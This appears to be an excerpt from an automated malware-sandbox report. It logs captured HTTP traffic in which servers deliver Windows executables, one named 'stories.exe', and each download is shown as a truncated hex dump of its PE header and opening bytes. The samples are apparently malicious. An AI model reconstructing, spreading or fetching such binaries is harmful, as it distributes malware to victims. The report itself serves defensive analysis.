53 86 a8 f1 e1 33 41 b1 d3 72 04 4d 9e 7f 71 66 e7 05 7b 8b 08 d6 a9 8b fd 21 49 55 07 c8 2f b1 4d 85 3f 3e f0 02 88 e8 08 a2 30 e7 65 94 96 58 16 66 e9 0b b0 69 09 55 69 17 02 ad cf a0 60 fc 77 be 88 66 61 b4 fe 4c 77 69 b7 56 4d a0 69 e1 34 ac d
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:06 GMTContent-Type: application/octet-streamContent-Length: 903168Last-Modified: Wed, 25 Sep 2024 19:30:48 GMTConnection: keep-aliveETag: "66f464e8-dc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 64 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 be 0d 00 00 08 00 00 00 00 00 00 ee dc 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 dc 0d 00 57 00 00 00 00 e0 0d 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 5c db 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 0d 00 00 20 00 00 00 be 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 e0 0d 00 00 06 00 00 00 c0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 c6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 ca 0d 00 9c 10 00 00 03 00 02 00 13 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 6b ae d1 cd 28 d7 51 9d 2e cd 47 51 4c b3 ec 71 b5 82 95 83 cc 4e 71 72 d8 5c 9c 5e 76 e3 84 45 f8 df e1 e3 3c 8a 1c 40 3d ea aa d5 1c 29 21 62 e6 3d 71 51 2e ec b2 2e 42 0e 63 fc 1c 8c c6 ce 3c bf 71 b5 69 92 20 41 eb a1 b5 51 45 2c 54 ae 14 7e 66 cb 58 33 ec 89 ec 1e 81 df 7e f2 8f dd 9d 24 15 29 0a 28 38 74 07 ac a7 9b c4 e1 01 ec ed 72 e2 63 40 10 de 9e 13 69 a8 32 85 3f c4 2d 14 38 d1 fe 2d 09 84 e1 e8 c6 a0 3a 05 b1 ac 27 49 b2 60 44 f2 e6 aa d3 3f 2f 33 3f c5 1d d2 57 50 1f 27 db 02 c0 58 4c 7a 96 12 ce ef 62 12 7c 20 32 97 e1 d4 88 c4 2a 12 d6 86 ed 5c 0b 15 a6 11 1a d4 ad 8b 9d 42 19 0f a1 ed 48 67 24 33 70 df ad 7c 2b 73 fc b8 4b 8f b1 11 ee 5a cb 6d ba 60 fb f1 ce eb 77 7f 09 77 bd 69 f1 ba 56 74 06 0f 6e ef 4c 4c 0a db f7 64 0e 60 61 8e 4f 8b c8 54 c4 fc 9e ca 05 c8 c0 23 6b b5 30 44 40 64 9a fc 38 70 a4 7b 2e 3f 5a 0c d0 8e 2d c7 c8 5c 57 bf ea bf cf 2c a7 28 b6 c7 50 cc 17 26 60 4c 06 09 3f 5a ef c4 4a 2c 79 fd 3a a0 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:09 GMTContent-Type: application/x-msdos-programContent-Length: 425984Connection: keep-aliveLast-Modified: Sat, 24 Aug 2024 17:17:20 GMTETag: "68000-620711078a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 00 06 00 8c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 3c 4c 00 00 e0 90 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 91 05 00 18 00 00 00 18 91 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 c8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0a e5 04 00 00 10 00 00 00 e6 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 38 10 01 00 00 00 05 00 00 12 01 00 00 ea 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 66 00 00 00 20 06 00 00 34 00 00 00 fc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 4c 00 00 00 a0 06 00 00 4e 00 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:12 GMTContent-Type: application/octet-streamContent-Length: 192000Last-Modified: Sat, 24 Aug 2024 14:58:01 GMTConnection: keep-aliveETag: "66c9f4f9-2ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 a9 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 00 80 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4a c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 ee ce 00 00 00 e0 01 00 00 d0 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 2b 21 00 00 b0 02 00 00 0c 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 2a 44 00 00 00 e0 23 00 00 46 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Fri, 27 Sep 2024 02:21:14 GMTContent-Type: application/octet-streamContent-Length: 3247089Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=stories.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:15 GMTContent-Type: application/octet-streamContent-Length: 4278784Last-Modified: Thu, 12 Sep 2024 13:56:06 GMTConnection: keep-aliveETag: "66e2f2f6-414a00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ba 08 00 00 8c 38 00 00 00 00 00 4c c9 08 00 00 10 00 00 00 d0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 41 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 09 00 78 22 00 00 00 20 0a 00 00 82 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 40 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 94 b9 08 00 00 10 00 00 00 ba 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 20 2d 00 00 00 d0 08 00 00 2e 00 00 00 be 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 01 0f 00 00 00 00 09 00 00 00 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 78 22 00 00 00 10 09 00 00 24 00 00 00 ec 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 40 09 00 00 00 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 50 09 00 00 02 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 40 b5 00 00 00 60 09 00 00 b6 00 00 00 12 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 82 37 00 00 20 0a 00 00 82 37 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 41 00 00 00 00 00 00 4a 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:21 GMTContent-Type: application/octet-streamContent-Length: 419328Last-Modified: Thu, 26 Sep 2024 16:40:28 GMTConnection: keep-aliveETag: "66f58e7c-66600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b d9 e1 fd 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 06 00 00 1a 00 00 00 00 00 00 ae 68 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 68 06 00 4b 00 00 00 00 80 06 00 f4 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 48 06 00 00 20 00 00 00 4a 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f4 16 00 00 00 80 06 00 00 18 00 00 00 4c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 64 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 68 06 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 5b 03 00 a0 aa 02 00 03 00 00 00 dd 04 00 06 ac 05 06 00 c0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 05 05 00 06 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 26 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e 32 03 00 04 28 bf 05 00 06 a2 25 17 1f 47 7e 32 03 00 04 28 bf 05 00 06 a2 25 18 1f 48 7e 32 03 00 04 28 bf 05 00 06 a2 25 19 1f 65 7e 32 03 00 04 28 bf 05 00 06 a2 7e 33 03 00 04 28 c3 05 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1a 00 00 06 13 06 00 73 e1 03 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e 32 03 00 04 28 bf 05 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e 32 03 00 04 28 bf 05 00 06 13 08 00 38 43 00 00 00 00 11 05 1f 1
